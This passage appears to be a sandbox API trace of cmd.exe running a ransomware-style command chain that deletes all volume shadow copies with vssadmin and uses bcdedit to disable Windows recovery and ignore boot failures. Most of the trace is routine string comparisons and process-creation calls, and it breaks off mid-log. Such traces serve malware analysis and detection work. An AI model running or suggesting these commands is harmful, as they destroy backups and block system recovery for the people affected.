vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" [0178.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0178.196] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.196] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0178.196] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0178.196] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0178.196] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0178.196] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0178.196] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0178.196] GetEnvironmentStringsW () returned 0x2b22f0* [0178.196] FreeEnvironmentStringsW (penv=0x2b22f0) returned 1 [0178.196] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.196] GetEnvironmentVariableW (in: 
lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.196] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.196] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.196] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.196] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.196] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0178.197] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.197] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfbb0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1cfbb0, lpFilePart=0x1cfbac | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cfbac*="system32") returned 0x13 [0178.197] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.197] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1cf92c | out: lpFindFileData=0x1cf92c) returned 0x2b0980 [0178.197] FindClose (in: hFindFile=0x2b0980 | out: hFindFile=0x2b0980) returned 1 [0178.197] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1cf92c | out: lpFindFileData=0x1cf92c) returned 0x2b0980 [0178.197] FindClose (in: hFindFile=0x2b0980 | out: hFindFile=0x2b0980) returned 1 [0178.197] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.197] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0178.197] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0178.198] GetEnvironmentStringsW () returned 0x2b01a0* [0178.198] FreeEnvironmentStringsW (penv=0x2b01a0) 
returned 1 [0178.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.198] GetConsoleOutputCP () returned 0x1b5 [0178.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.198] GetUserDefaultLCID () returned 0x409 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="0") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="0") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfcf0, cchData=128 | out: lpLCData="1") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0178.199] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0178.199] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.200] GetConsoleTitleW (in: lpConsoleTitle=0x2a0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0178.201] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0178.202] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0178.202] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0178.202] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0178.202] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0178.202] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0178.202] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0178.202] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0178.204] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0178.205] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0178.205] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0178.205] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0178.205] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0178.205] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0178.205] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0178.207] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0178.207] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0178.207] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0178.207] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0178.207] 
_wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0178.207] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0178.207] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0178.209] GetConsoleTitleW (in: lpConsoleTitle=0x1cf984, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.209] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe")) returned 0x20 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0178.210] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0178.211] _wcsicmp 
(_String1="vssadmin.exe", _String2="GOTO") returned 15 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") 
returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0178.212] _wcsicmp 
(_String1="vssadmin.exe", _String2="START") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="FOR") returned 16 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="IF") returned 13 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="REM") returned 4 [0178.213] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0178.214] SetErrorMode (uMode=0x0) returned 0x1 [0178.214] SetErrorMode (uMode=0x1) returned 0x0 [0178.214] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b1d30, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf4a4*="system32") returned 0x13 [0178.214] SetErrorMode (uMode=0x1) returned 0x1 [0178.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.214] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.219] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1cf240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf240) returned 0x2a0ee8 [0178.220] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 [0178.220] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0178.220] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0178.220] GetConsoleTitleW (in: lpConsoleTitle=0x1cf718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.220] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf5a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf668 | out: lpAttributeList=0x1cf5a0, lpSize=0x1cf668) returned 1 [0178.220] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf5a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf660, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf5a0, lpPreviousValue=0x0) returned 1 [0178.220] GetStartupInfoW (in: lpStartupInfo=0x1cf55c | out: lpStartupInfo=0x1cf55c*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.220] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.221] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf5fc*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, 
wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf648 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x1cf648*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc24, dwThreadId=0xc90)) returned 1 [0178.438] CloseHandle (hObject=0x4c) returned 1 [0178.438] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.438] GetEnvironmentStringsW () returned 0x2b01a0* [0178.438] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.438] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.577] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf53c | out: lpExitCode=0x1cf53c*=0x0) returned 1 [0214.577] CloseHandle (hObject=0x50) returned 1 [0214.577] _vsnwprintf (in: _Buffer=0x1cf684, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf548 | out: _Buffer="00000000") returned 8 [0214.577] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.577] GetEnvironmentStringsW () returned 0x2b2250* [0214.577] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.577] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.577] GetEnvironmentStringsW () returned 0x2b2250* [0214.577] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.577] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf5a0 | out: lpAttributeList=0x1cf5a0) [0214.577] GetConsoleTitleW (in: lpConsoleTitle=0x1cf920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.578] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe")) returned 0x20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned 
-18 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", 
_String2="TITLE") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.579] _wcsicmp 
(_String1="bcdedit.exe", _String2="MD") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") 
